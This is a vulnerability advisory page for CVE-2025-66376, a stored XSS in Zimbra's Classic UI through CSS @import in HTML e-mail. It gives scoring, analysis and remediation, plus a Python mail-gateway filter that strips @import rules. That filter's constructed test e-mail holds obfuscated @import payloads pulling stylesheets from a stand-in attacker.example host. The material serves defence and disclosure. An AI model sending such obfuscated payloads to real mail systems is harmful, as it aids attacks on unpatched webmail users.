
Zimbra Collaboration Suite CVE-2025-66376

HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-01-05 cve@mitre.org
7.2
CVSS 3.1 · NVD

Severity by source

NVD PRIMARY
7.2 HIGH
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

Added to CISA KEV: Mar 18, 2026 - 20:13 (source: cisa)
Analysis Generated: Mar 12, 2026 - 21:54 (source: vuln.today)
CVE Published: Jan 05, 2026 - 15:15 (source: nvd)

Description (CVE.org)

Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message.

Analysis (AI)

Zimbra Collaboration Suite (ZCS) 10.0 before 10.0.18 and 10.1 before 10.1.13 contain a stored cross-site scripting vulnerability in the Classic web UI: CSS @import directives in an HTML e-mail message are not neutralised, so an attacker can get script running in the recipient's webmail session simply by sending a message. CVE-2025-66376 is listed in CISA's KEV catalogue, which means exploitation in the wild has been confirmed. When the recipient opens the message in the Classic UI, the attacker's script runs in the Zimbra origin and can hijack the session or act on the mailbox, which makes the flaw attractive for targeted, e-mail-borne attacks against organisations that still use the Classic interface. Note that NVD scores User Interaction as None even though, as a stored XSS in mail content, the payload fires when the recipient views the message.

Technical Context (AI)

The vector is a CSS @import rule carried in the message's HTML, for example inside a <style> element. The Classic UI's sanitiser neutralises many scripting vectors when it renders HTML mail, but it does not block @import, a stylesheet-level directive that pulls in another stylesheet from a URL of the sender's choosing. The advisory states that this is sufficient for stored XSS in the Classic UI; it does not spell out the exact path from the imported stylesheet to script execution, and that path should not be assumed to rely on legacy CSS expression() evaluation, which only Internet Explorer ever supported. Because the payload lives in the stored message, it fires every time the recipient opens that message in the Classic UI, and a single delivered message is enough: no reply, click or attachment is required.

Remediation (AI)

Upgrade to ZCS 10.0.18 or later on the 10.0 line, or 10.1.13 or later on the 10.1 line; this is the only complete fix. The advisory scopes the flaw to the Classic UI, so moving users to the Modern UI removes the affected rendering path while upgrades are scheduled, but treat that as a workaround rather than a patch. As a defence-in-depth measure, strip or quarantine messages whose HTML carries CSS @import rules at the mail gateway, bearing in mind that such a filter must normalise CSS escapes, comments and HTML entities or it is trivially bypassed, and that it does not close other gaps in the sanitiser. Log and review messages that trip the filter; given the KEV listing, mailboxes that received such messages before patching should be treated as potentially compromised, and active sessions and mailbox settings for those users reviewed.
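The gateway-side filter that the remediation above recommends, applied to the @import vector described under Technical Context, as an added example: this is not Zimbra's code and not the patched sanitiser. It walks the text/html parts of a message, normalises CSS escapes, comments and HTML entities so that obfuscated spellings such as @\69 mport or @import/**/url(...) are still recognised, and drops any <style> block or style attribute that carries an @import rule, returning the removed rules for logging. The sample message and the attacker.example URLs are constructed for the example.

```python
"""Detect and strip CSS @import rules in HTML e-mail.

Added example for a mail-gateway filter; not Zimbra's code and not the fix.
Detection runs on *normalised* CSS so that escaped, commented or
entity-encoded spellings of "@import" are caught; on a hit the whole
<style> block or style="" attribute is dropped rather than edited in place,
which avoids re-serialising attacker-controlled CSS back into the HTML.
"""
import re
from email import message_from_string
from html import unescape as html_unescape

# "\69 " (1-6 hex digits, optional trailing whitespace) or "\i" (literal escape)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)", re.S)
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_STYLE_BLOCK = re.compile(r"(<style\b[^>]*>)(.*?)(</style\s*>)", re.I | re.S)
_STYLE_ATTR = re.compile(r"""(\sstyle\s*=\s*)(["'])(.*?)\2""", re.I | re.S)
# One @import rule: the at-keyword up to its terminating ';' (or a brace/end).
_IMPORT_RULE = re.compile(r"@import\b[^;{}]*;?", re.I | re.S)


def _decode_escape(m: re.Match) -> str:
    if m.group(1) is None:            # "\<char>": the character itself
        return m.group(2)
    cp = int(m.group(1), 16)
    return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"


def normalize_css(css: str) -> str:
    """Undo the encodings an attacker can hide an at-keyword behind.

    Browsers decode entities inside style="" attributes but not inside
    <style>; decoding everywhere is a harmless over-approximation for a
    filter that only uses the result for matching.
    """
    css = html_unescape(css)
    css = _CSS_COMMENT.sub(" ", css)    # "@import/**/url(x)" -> "@import url(x)"
    return _CSS_ESCAPE.sub(_decode_escape, css)


def find_imports(css: str) -> list[str]:
    """Return every @import rule present in the normalised form of css."""
    return [m.group(0).strip() for m in _IMPORT_RULE.finditer(normalize_css(css))]


def sanitize_html(body: str) -> tuple[str, list[str]]:
    """Drop every <style> block and style="" attribute that carries an @import.

    Returns the cleaned HTML and the list of rules removed (for logging).
    """
    removed: list[str] = []

    def drop_block(m: re.Match) -> str:
        found = find_imports(m.group(2))
        if not found:
            return m.group(0)
        removed.extend(found)
        return m.group(1) + "/* stylesheet removed by mail filter */" + m.group(3)

    def drop_attr(m: re.Match) -> str:
        found = find_imports(m.group(3))
        if not found:
            return m.group(0)
        removed.extend(found)
        return ""  # drops the attribute together with its leading whitespace

    body = _STYLE_BLOCK.sub(drop_block, body)
    body = _STYLE_ATTR.sub(drop_attr, body)
    return body, removed


def scan_message(raw: str) -> list[str]:
    """Walk a MIME message and report @import rules from its text/html parts."""
    hits: list[str] = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True) or b""
        html = payload.decode(part.get_content_charset() or "utf-8", "replace")
        hits.extend(sanitize_html(html)[1])
    return hits


# Constructed sample: three obfuscated @import rules; not a real campaign message.
SAMPLE_HTML = (
    '<html><head><style>'
    '@\\69 mport url("https://attacker.example/evil.css");'
    'body { color: #000 }'
    '@import/**/"https://attacker.example/evil2.css";'
    '</style></head><body>'
    '<p style="&#64;import url(x.css); color: red">Invoice attached</p>'
    '</body></html>'
)
SAMPLE_EMAIL = (
    "From: sender@attacker.example\n"
    "To: victim@corp.example\n"
    "Subject: Invoice\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n" + SAMPLE_HTML
)

if __name__ == "__main__":
    for rule in scan_message(SAMPLE_EMAIL):
        print("blocked:", rule)
    print(sanitize_html(SAMPLE_HTML)[0])
```

Dropping the whole stylesheet on a hit is deliberate: rewriting attacker-controlled CSS and putting it back into the message reopens the same class of parser-differential bypass the filter is meant to stop. The regex tag matching is good enough for a gateway that only needs to decide whether to quarantine; it is not a substitute for the upgrade.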


CVE-2025-66376 vulnerability details – vuln.today
